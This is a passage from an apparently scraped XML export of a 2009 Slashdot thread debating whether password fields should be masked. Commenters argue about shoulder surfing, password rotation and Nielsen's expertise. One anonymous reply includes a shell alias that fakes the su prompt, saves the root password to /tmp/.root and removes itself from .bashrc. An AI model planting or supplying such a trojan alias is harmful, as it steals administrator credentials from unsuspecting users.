The problem is that they are typically forced to change it each and every month .
That digit you were talking about.. yeah.. it goes 1 on the first incarnation of the password , then 2 on the second , 3 on the third.. .</tokentext>
<sentencetext>The problem isnt remembering one 6-8 character password.
The problem is that they are typically forced to change it each and every month.
That digit you were talking about.. yeah.. it goes 1 on the first incarnation of the password, then 2 on the second, 3 on the third...</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474483</id>
	<title>"Usability expert "</title>
	<author>QuietLagoon</author>
	<datestamp>1245932820000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>That's the problem, he is not a security expert.</htmltext>
<tokenext>That 's the problem , he is not a security expert .</tokentext>
<sentencetext>That's the problem, he is not a security expert.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473469</id>
	<title>might be good or a bad thing</title>
	<author>bigbigbison</author>
	<datestamp>1245928800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I think in general it would be a bad idea to show the password by default. However, it would be nice to have an option to show it. I'm sure there's a firefox extension or greasemonkey script for that.
<br> <br>My school started using passphrases and if you didn't it would bug you to change to one every time you logged into the network, or checked your email, or the online courseware, or the library. So I eventually changed to a passphrase that is several words long. <br> <br>It is really frustrating to get halfway into the sentence and realize you typed a wrong letter and have to start all over again because you can't tell if you typed one character wrong or more than that. But I also often type my passphrase into the computer in front of my students and I'm sure at least one of them would love to get into my account to cause mischief.</htmltext>
<tokenext>I think in general it would be a bad idea to show the password by default .
However , it would be nice to have an option to show it .
I 'm sure there 's a firefox extension or greasemonkey script for that .
My school started using passphrases and if you did n't it would bug you to change to one every time you logged into the network , or checked your email , or the online courseware , or the library .
So I eventually changed to a passphrase that is several words long .
It is really frustrating to get halfway into the sentence and realize you typed a wrong letter and have to start all over again because you ca n't tell if you typed one character wrong or more than that .
But I also often type my passphrase into the computer in front of my students and I 'm sure at least one of them would love to get into my account to cause mischief .</tokentext>
<sentencetext>I think in general it would be a bad idea to show the password by default.
However, it would be nice to have an option to show it.
I'm sure there's a firefox extension or greasemonkey script for that.
My school started using passphrases and if you didn't it would bug you to change to one every time you logged into the network, or checked your email, or the online courseware, or the library.
So I eventually changed to a passphrase that is several words long.
It is really frustrating to get halfway into the sentence and realize you typed a wrong letter and have to start all over again because you can't tell if you typed one character wrong or more than that.
But I also often type my passphrase into the computer in front of my students and I'm sure at least one of them would love to get into my account to cause mischief.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472621</id>
	<title>Finally someone talks about this idiocy!</title>
	<author>Anonymous</author>
	<datestamp>1245925260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This is the best thing in a long time! I've been saying the same for years. All the idiots who don't understand STFU.</p></htmltext>
<tokenext>This is the best thing in a long time !
I 've been saying the same for years .
All the idiots who do n't understand STFU .</tokentext>
<sentencetext>This is the best thing in a long time!
I've been saying the same for years.
All the idiots who don't understand STFU.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474005</id>
	<title>Just look under the keyboard...</title>
	<author>gary\_7vn</author>
	<datestamp>1245931080000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Human weakness will always overcome ANY security. CBC, here in Canada did a survey which revealed the fact that 40\% of their users has written their PW on the bottom of their keyboard.</htmltext>
<tokenext>Human weakness will always overcome ANY security .
CBC , here in Canada did a survey which revealed the fact that 40 \ % of their users has written their PW on the bottom of their keyboard .</tokentext>
<sentencetext>Human weakness will always overcome ANY security.
CBC, here in Canada did a survey which revealed the fact that 40\% of their users has written their PW on the bottom of their keyboard.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470937</id>
	<title>He's an idiot</title>
	<author>Anonymous</author>
	<datestamp>1245963180000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If you're not sure you're entering your password correctly, look around, ensure nobody's looking over your shoulder, and then type your password into the user id field. If it's correct, back space and enter your user id, and then the password.</p></htmltext>
<tokenext>If you 're not sure you 're entering your password correctly , look around , ensure nobody 's looking over your shoulder , and then type your password into the user id field .
If it 's correct , back space and enter your user id , and then the password .</tokentext>
<sentencetext>If you're not sure you're entering your password correctly, look around, ensure nobody's looking over your shoulder, and then type your password into the user id field.
If it's correct, back space and enter your user id, and then the password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475157</id>
	<title>Re:Two words</title>
	<author>rantingkitten</author>
	<datestamp>1245935520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Maybe it takes practice, but I can rarely tell what someone is typing just by watching their fingers on the keyboard, especially if they're even remotely fast typists.  Or if the lighting sucks.
<br> <br>
I can, however, glance at some text on a screen and read what's there.  If the password is a normal English word or just a slight variation -- which is the case for most English-speaking users -- it would only take a fraction of a second for me to see what's written, and remember it.  Shoulder-surfing only goes so far.</htmltext>
<tokenext>Maybe it takes practice , but I can rarely tell what someone is typing just by watching their fingers on the keyboard , especially if they 're even remotely fast typists .
Or if the lighting sucks .
I can , however , glance at some text on a screen and read what 's there .
If the password is a normal English word or just a slight variation -- which is the case for most English-speaking users -- it would only take a fraction of a second for me to see what 's written , and remember it .
Shoulder-surfing only goes so far .</tokentext>
<sentencetext>Maybe it takes practice, but I can rarely tell what someone is typing just by watching their fingers on the keyboard, especially if they're even remotely fast typists.
Or if the lighting sucks.
I can, however, glance at some text on a screen and read what's there.
If the password is a normal English word or just a slight variation -- which is the case for most English-speaking users -- it would only take a fraction of a second for me to see what's written, and remember it.
Shoulder-surfing only goes so far.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476125</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245941160000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>***ing your passwords protects against a very small hole...</p></div><p>That's all I read and couldn't stop laughing.  Stretch that password out by ****ing the **** out of it.</p></div>
	</htmltext>
<tokenext>* * * ing your passwords protects against a very small hole...That 's all I read and could n't stop laughing .
Stretch that password out by * * * * ing the * * * * out of it .</tokentext>
<sentencetext>***ing your passwords protects against a very small hole...That's all I read and couldn't stop laughing.
Stretch that password out by ****ing the **** out of it.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471661</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245922260000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Shoulder surfing can be done casually.  I could do it just strolling by your cubicle, or if you login to a computer with a projector as suggested above.  It's a lot harder to see a password from your fingers, particularly since muscle memory lets you type your password a lot faster than normal text.  Installing hardware, van Eck phreaking, etc. all requires much more legwork and is a lot more obvious to a person sitting at their computer.</p></htmltext>
<tokenext>Shoulder surfing can be done casually .
I could do it just strolling by your cubicle , or if you login to a computer with a projector as suggested above .
It 's a lot harder to see a password from your fingers , particularly since muscle memory lets you type your password a lot faster than normal text .
Installing hardware , van Eck phreaking , etc .
all requires much more legwork and is a lot more obvious to a person sitting at their computer .</tokentext>
<sentencetext>Shoulder surfing can be done casually.
I could do it just strolling by your cubicle, or if you login to a computer with a projector as suggested above.
It's a lot harder to see a password from your fingers, particularly since muscle memory lets you type your password a lot faster than normal text.
Installing hardware, van Eck phreaking, etc.
all requires much more legwork and is a lot more obvious to a person sitting at their computer.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472381</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245924420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field."</p><p>But you just said:</p><p>"He's not a security expert"</p><p>Therefore he is not a expert in the field of Security, which I would assume one would need to be to not have to have a citation to say "Typically, masking passwords doesn't even increase security<nobr> <wbr></nobr>..."</p></htmltext>
<tokenext>" If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field .
" But you just said : " He 's not a security expert " Therefore he is not a expert in the field of Security , which I would assume one would need to be to not have to have a citation to say " Typically , masking passwords does n't even increase security ... "</tokentext>
<sentencetext>"If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.
"But you just said:"He's not a security expert"Therefore he is not a expert in the field of Security, which I would assume one would need to be to not have to have a citation to say "Typically, masking passwords doesn't even increase security ..."</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477985</id>
	<title>Re:Makes sense</title>
	<author>ewanm89</author>
	<datestamp>1245956040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>what if I have performed a VNC dll injection attack to open a view only shared session?</htmltext>
<tokenext>what if I have performed a VNC dll injection attack to open a view only shared session ?</tokentext>
<sentencetext>what if I have performed a VNC dll injection attack to open a view only shared session?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470953</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476659</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245945000000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Security is not just to protect the lusers it is also to protect the system.</p></htmltext>
<tokenext>Security is not just to protect the lusers it is also to protect the system .</tokentext>
<sentencetext>Security is not just to protect the lusers it is also to protect the system.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471647</id>
	<title>Re:hunter2</title>
	<author>pem</author>
	<datestamp>1245922200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Hey, can I have your bank account details?</htmltext>
<tokenext>Hey , can I have your bank account details ?</tokentext>
<sentencetext>Hey, can I have your bank account details?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472247</id>
	<title>Re:Indeed lack of imagination</title>
	<author>Anonymous</author>
	<datestamp>1245924000000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><blockquote><div><p>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</p></div></blockquote><p>alias su='echo -n "Password: ";stty -echo;read p;stty echo;echo;echo $p &gt;<nobr> <wbr></nobr>/tmp/.root;sleep 2;echo su: incorect password;cat ~/.bashrc|grep -v<nobr> <wbr></nobr>/tmp/.root&gt;~/.bashrc2;mv ~/.bashrc2 ~/.bashrc; unalias su'</p></div>
	</htmltext>
<tokenext>4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) Linuxalias su = 'echo -n " Password : " ; stty -echo ; read p ; stty echo ; echo ; echo $ p &gt; /tmp/.root ; sleep 2 ; echo su : incorect password ; cat ~ /.bashrc | grep -v /tmp/.root &gt; ~ /.bashrc2 ; mv ~ /.bashrc2 ~ /.bashrc ; unalias su '</tokentext>
<sentencetext>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) Linuxalias su='echo -n "Password: ";stty -echo;read p;stty echo;echo;echo $p &gt; /tmp/.root;sleep 2;echo su: incorect password;cat ~/.bashrc|grep -v /tmp/.root&gt;~/.bashrc2;mv ~/.bashrc2 ~/.bashrc; unalias su'
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473179</id>
	<title>Re:its not a problem for me</title>
	<author>Anonymous</author>
	<datestamp>1245927420000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Lol.  Good call on the "informative" mod.</p></htmltext>
<tokenext>Lol .
Good call on the " informative " mod .</tokentext>
<sentencetext>Lol.
Good call on the "informative" mod.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472017</id>
	<title>Re:Two words</title>
	<author>TheSeventh</author>
	<datestamp>1245923340000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Shoulder surfing isn't really much of a problem in the work place.
When was the last time someone stood close enough to read your password and you didn't know they where there?</p><p>Shoulder surfing is just an excuse to implement a half brained feel good 'security' measure.</p></div><p>
 . . . except when someone is at your computer because you need to show them something, and they have to wait while you type in the password -- I'm sure you can just ask them to look away then or something.<br> <br>

Plus, as a bonus, if we turn off password masking, key loggers won't be nearly as necessary, and screen shot grabbers could be used much more effectively . .<nobr> <wbr></nobr>.<br> <br>

Call me old-fashioned, or paranoid, or someone who likes to keep his privacy, but my passwords aren't written down ANYWHERE.  That includes post-it notes and saved files. And I'd like to keep them off the screen as well.<br> <br>

To me this just sounds like more of the same complaints, which keep getting louder:<br>  "I don't understand this computer stuff.  Make it easier for me so I don't have to think, and so I can click on every email attachment and never have to login because that takes too long, and blah blah blah."</p></div>
	</htmltext>
<tokenext>Shoulder surfing is n't really much of a problem in the work place .
When was the last time someone stood close enough to read your password and you did n't know they where there ? Shoulder surfing is just an excuse to implement a half brained feel good 'security ' measure .
. .
. except when someone is at your computer because you need to show them something , and they have to wait while you type in the password -- I 'm sure you can just ask them to look away then or something .
Plus , as a bonus , if we turn off password masking , key loggers wo n't be nearly as necessary , and screen shot grabbers could be used much more effectively .
. .
Call me old-fashioned , or paranoid , or someone who likes to keep his privacy , but my passwords are n't written down ANYWHERE .
That includes post-it notes and saved files .
And I 'd like to keep them off the screen as well .
To me this just sounds like more of the same complaints , which keep getting louder : " I do n't understand this computer stuff .
Make it easier for me so I do n't have to think , and so I can click on every email attachment and never have to login because that takes too long , and blah blah blah .
"</tokentext>
<sentencetext>Shoulder surfing isn't really much of a problem in the work place.
When was the last time someone stood close enough to read your password and you didn't know they where there?Shoulder surfing is just an excuse to implement a half brained feel good 'security' measure.
. .
. except when someone is at your computer because you need to show them something, and they have to wait while you type in the password -- I'm sure you can just ask them to look away then or something.
Plus, as a bonus, if we turn off password masking, key loggers won't be nearly as necessary, and screen shot grabbers could be used much more effectively .
. .
Call me old-fashioned, or paranoid, or someone who likes to keep his privacy, but my passwords aren't written down ANYWHERE.
That includes post-it notes and saved files.
And I'd like to keep them off the screen as well.
To me this just sounds like more of the same complaints, which keep getting louder:  "I don't understand this computer stuff.
Make it easier for me so I don't have to think, and so I can click on every email attachment and never have to login because that takes too long, and blah blah blah.
"
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470953</id>
	<title>Makes sense</title>
	<author>Anonymous</author>
	<datestamp>1245963180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Using a masked password to protect security is useless 99\% of the time you are typing in a password.  The only time it is useful is if you are in a semi-public environment (classroom, coffee shop, etc).  I suppose it might also be useful if you log into highly secure sites and are worried about someone across the street with binoculaurs looking through your window, but then you have other security issues to worry about<nobr> <wbr></nobr>:)
<br> <br>
Perhaps a checkbox, off by default, next to password boxes that will toggle the mask.</htmltext>
<tokenext>Using a masked password to protect security is useless 99 \ % of the time you are typing in a password .
The only time it is useful is if you are in a semi-public environment ( classroom , coffee shop , etc ) .
I suppose it might also be useful if you log into highly secure sites and are worried about someone across the street with binoculaurs looking through your window , but then you have other security issues to worry about : ) Perhaps a checkbox , off by default , next to password boxes that will toggle the mask .</tokentext>
<sentencetext>Using a masked password to protect security is useless 99\% of the time you are typing in a password.
The only time it is useful is if you are in a semi-public environment (classroom, coffee shop, etc).
I suppose it might also be useful if you log into highly secure sites and are worried about someone across the street with binoculaurs looking through your window, but then you have other security issues to worry about :)
 
Perhaps a checkbox, off by default, next to password boxes that will toggle the mask.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979</id>
	<title>Easy solution</title>
	<author>wjousts</author>
	<datestamp>1245963240000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext>Change your password to **********</htmltext>
<tokenext>Change your password to * * * * * * * * * *</tokentext>
<sentencetext>Change your password to **********</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471589</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245922020000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><blockquote><div><p>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</p></div>
</blockquote><p>
No, but if Stephen Hawking made a claim that flew in the face of established conventions in - say - psychology, I <em>would</em> expect a citation. Nielsen is a usability expert, not a security expert, and GP questioned his claim about the security aspect.</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field .
No , but if Stephen Hawking made a claim that flew in the face of established conventions in - say - psychology , I would expect a citation .
Nielsen is a usability expert , not a security expert , and GP questioned his claim about the security aspect .</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.
No, but if Stephen Hawking made a claim that flew in the face of established conventions in - say - psychology, I would expect a citation.
Nielsen is a usability expert, not a security expert, and GP questioned his claim about the security aspect.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478241</id>
	<title>Re:Indeed lack of imagination</title>
	<author>Anonymous</author>
	<datestamp>1245958500000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><blockquote><div><p>3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg. teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.</p></div></blockquote><p>I know we're getting kind of off-topic here, but I present over VC on an almost daily basis, and have some simple advice to help you with this problem.</p><p>Your best option is to do your audience a favor and have your presentation ready before it's time to present.</p><p>If you're going to show them some webpages or work in an application, too, have those things loaded already.  Don't make them wait while you open things and fumble around with login boxes.  Spare them the sight of the private messages in your webmail's inbox, or the files and wacky background on your desktop, or other irrelevant things.</p><p>They're there to see your presentation.  If you're not ready to present, you shouldn't be projecting.  They don't want to be exposed to all that other crap -- it's unprofessional, it distracts the audience, and it wastes their time.</p><p>Otherwise, if you're unable to prepare, and there's a risk of something sensitive coming on screen, unplug the VGA cable, do your thing, and plug it back in.  Simple and effective.</p></div>
	</htmltext>
<tokenext>3 ) How many times have you given a presentation where your screen view ( but not your keyboard input ) goes worldwide ( eg .
teleconference ) or over a set of wires that you know have n't been tampered with ( conference room ) - again , logging in to your webmail or so to find a copy of your presentation.I know we 're getting kind of off-topic here , but I present over VC on an almost daily basis , and have some simple advice to help you with this problem.Your best option is to do your audience a favor and have your presentation ready before it 's time to present.If you 're going to show them some webpages or work in an application , too , have those things loaded already .
Do n't make them wait while you open things and fumble around with login boxes .
Spare them the sight of the private messages in your webmail 's inbox , or the files and wacky background on your desktop , or other irrelevant things.They 're there to see your presentation .
If you 're not ready to present , you should n't be projecting .
They do n't want to be exposed to all that other crap -- it 's unprofessional , it distracts the audience , and it wastes their time.Otherwise , if you 're unable to prepare , and there 's a risk of something sensitive coming on screen , unplug the VGA cable , do your thing , and plug it back in .
Simple and effective .</tokentext>
<sentencetext>3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg.
teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.I know we're getting kind of off-topic here, but I present over VC on an almost daily basis, and have some simple advice to help you with this problem.Your best option is to do your audience a favor and have your presentation ready before it's time to present.If you're going to show them some webpages or work in an application, too, have those things loaded already.
Don't make them wait while you open things and fumble around with login boxes.
Spare them the sight of the private messages in your webmail's inbox, or the files and wacky background on your desktop, or other irrelevant things.They're there to see your presentation.
If you're not ready to present, you shouldn't be projecting.
They don't want to be exposed to all that other crap -- it's unprofessional, it distracts the audience, and it wastes their time.Otherwise, if you're unable to prepare, and there's a risk of something sensitive coming on screen, unplug the VGA cable, do your thing, and plug it back in.
Simple and effective.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605</id>
	<title>Re:hunter2</title>
	<author>adamstew</author>
	<datestamp>1245922080000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p><b>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</b></p><p>Yes!  I would!  I would want to see the research that lead him to his conclusion in physics.  Or, more specifically, I would want another physicist to look at his research and give his validation to say that it's sound.</p></htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field.Yes !
I would !
I would want to see the research that lead him to his conclusion in physics .
Or , more specifically , I would want another physicist to look at his research and give his validation to say that it 's sound .</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.Yes!
I would!
I would want to see the research that lead him to his conclusion in physics.
Or, more specifically, I would want another physicist to look at his research and give his validation to say that it's sound.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471703</id>
	<title>Nothing to see here</title>
	<author>macbeth66</author>
	<datestamp>1245922380000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Just another blowhard 'export'.</p><p>Remember Edward Yourdon?  He wrote "Decline and Fall of the American Programmer" and, at the time, everyone thought the gig was up.  He sold a lot of copies, but it was just so much drivel designed to sell books.</p><p>Don't get me wrong, it is great if you are one of these guys.  I'll take the money...</p></htmltext>
<tokenext>Just another blowhard 'export'.Remember Edward Yourdon ?
He wrote " Decline and Fall of the American Programmer " and , at the time , everyone thought the gig was up .
He sold a lot of copies , but it was just so much drivel designed to sell books.Do n't get me wrong , it is great if you are one of these guys .
I 'll take the money.. .</tokentext>
<sentencetext>Just another blowhard 'export'.Remember Edward Yourdon?
He wrote "Decline and Fall of the American Programmer" and, at the time, everyone thought the gig was up.
He sold a lot of copies, but it was just so much drivel designed to sell books.Don't get me wrong, it is great if you are one of these guys.
I'll take the money...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471845</id>
	<title>Re:Four words</title>
	<author>javelinco</author>
	<datestamp>1245922920000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext>Good for you.  Have you ever considered that you aren't in the majority?  If not, I'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with "But I..."</htmltext>
<tokenext>Good for you .
Have you ever considered that you are n't in the majority ?
If not , I 'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with " But I... "</tokentext>
<sentencetext>Good for you.
Have you ever considered that you aren't in the majority?
If not, I'd suggest that you start considering that question EVERY SINGLE TIME you start thinking to yourself something that starts with "But I..."</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471181</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472281</id>
	<title>He has a good point...</title>
	<author>T Murphy</author>
	<datestamp>1245924120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Clearly it is insecure to type your normal password in a plaintext box, so I will assume* he means you should use one-time passwords. One-time passwords are random and unfamiliar, therefore hard to type correctly the first try, so plaintext password fields would complement this technology well. It doesn't matter if someone sees such a password, since it becomes a useless string of characters within seconds.<br> <br>
*For the sake of conversation</htmltext>
<tokenext>Clearly it is insecure to type your normal password in a plaintext box , so I will assume * he means you should use one-time passwords .
One-time passwords are random and unfamiliar , therefore hard to type correctly the first try , so plaintext password fields would complement this technology well .
It does n't matter if someone sees such a password , since it becomes a useless string of characters within seconds .
* For the sake of conversation</tokentext>
<sentencetext>Clearly it is insecure to type your normal password in a plaintext box, so I will assume* he means you should use one-time passwords.
One-time passwords are random and unfamiliar, therefore hard to type correctly the first try, so plaintext password fields would complement this technology well.
It doesn't matter if someone sees such a password, since it becomes a useless string of characters within seconds.
*For the sake of conversation</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475529</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245937680000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>expert(n): Someone who knows how much they don't know.</p></htmltext>
<tokenext>expert ( n ) : Someone who knows how much they do n't know .</tokentext>
<sentencetext>expert(n): Someone who knows how much they don't know.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471133</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475481</id>
	<title>Re:Two words</title>
	<author>RedWizzard</author>
	<datestamp>1245937440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Shoulder surfing.</p></div><p>
If someone is shoulder surfing either ask them to leave or don't log in just then. It's not rocket science.
</p><p>
Why should I be inconvenienced just because the developer wants to save me from a situation that may not even apply? It's funny, usually the consensus on Slashdot is against trying to save people from themselves.
</p><p>
On the other hand any password that gets used much is going to be so well known that typos are very unlikely anyhow, so it's not like it's a big usability issue.</p></div>
	</htmltext>
<tokenext>Shoulder surfing .
If someone is shoulder surfing either ask them to leave or do n't log in just then .
It 's not rocket science .
Why should I be inconvenienced just because the developer wants to save me from a situation that may not even apply ?
It 's funny , usually the consensus on Slashdot is against trying to save people from themselves .
On the other hand any password that gets used much is going to be so well known that typos are very unlikely anyhow , so it 's not like it 's a big usability issue .</tokentext>
<sentencetext>Shoulder surfing.
If someone is shoulder surfing either ask them to leave or don't log in just then.
It's not rocket science.
Why should I be inconvenienced just because the developer wants to save me from a situation that may not even apply?
It's funny, usually the consensus on Slashdot is against trying to save people from themselves.
On the other hand any password that gets used much is going to be so well known that typos are very unlikely anyhow, so it's not like it's a big usability issue.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470911</id>
	<title>As they say...</title>
	<author>Franklin Brauner</author>
	<datestamp>1245963120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Better to have one and not need it, than to need one and not have it.</htmltext>
<tokenext>Better to have one and not need it , than to need one and not have it .</tokentext>
<sentencetext>Better to have one and not need it, than to need one and not have it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471295</id>
	<title>Re:Making my point with humor</title>
	<author>religious freak</author>
	<datestamp>1245921120000</datestamp>
	<modclass>Funny</modclass>
	<modscore>4</modscore>
